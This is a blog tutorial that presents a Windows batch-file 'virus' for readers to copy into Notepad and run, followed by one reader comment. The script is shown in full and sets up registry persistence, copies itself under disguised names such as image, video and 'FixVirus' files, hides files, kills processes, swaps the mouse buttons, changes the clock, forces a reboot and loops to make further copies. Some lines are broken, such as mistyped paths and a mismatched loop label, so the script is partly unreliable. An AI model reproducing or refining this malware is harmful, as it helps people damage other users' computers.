Creating a Highly Dangerous Virus Using Notepad

Posted by

Ever thought of making a virus that can destroy the computer ???

Of course yes, Here I give you instructions for making a SERIOUSLY DANGEROUS computer virus using notepad.


This virus has very very dangerous properties :-

  • Copy itself into startup
  • Copy itself over one thousand times into random spots in your computer.
  • Hide its self and all other created files
  • Task kill MSN, Norton, Windows Explorer, Limewire.
  • Swap the left mouse button with the right one
  • Opens alert boxes
  • Changes the time to 12:00 and shuts down the computer

Copy this code into notepad and save as Greatgame.bat (while saving select all files instead of text ).

Here is the Code:

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c “VIRUS DETECTED”
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP

PLEASE DON’T DARE TO TEST IT ON YOUR COMPUTER

This was tutorial for making a batch file virus using notepad.You can also change the name of virus , after copying this code in notepad press CTRL + F and replace all the occurring of the word “Greatgame” with the name of your choice , but u also have to change name of the file

NOTE:-  This virus is very very dangerous , it can crash your system completely.Please do not harm anyone using this virus. This is purely for education purposes.

Posted by Shubham ;)

4 comments

  1. hii…..plz tell how to find this file….its not appearing on screen ………i have saved this file…..but i cant able to find this ……….this is about the dangerous virus…….

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.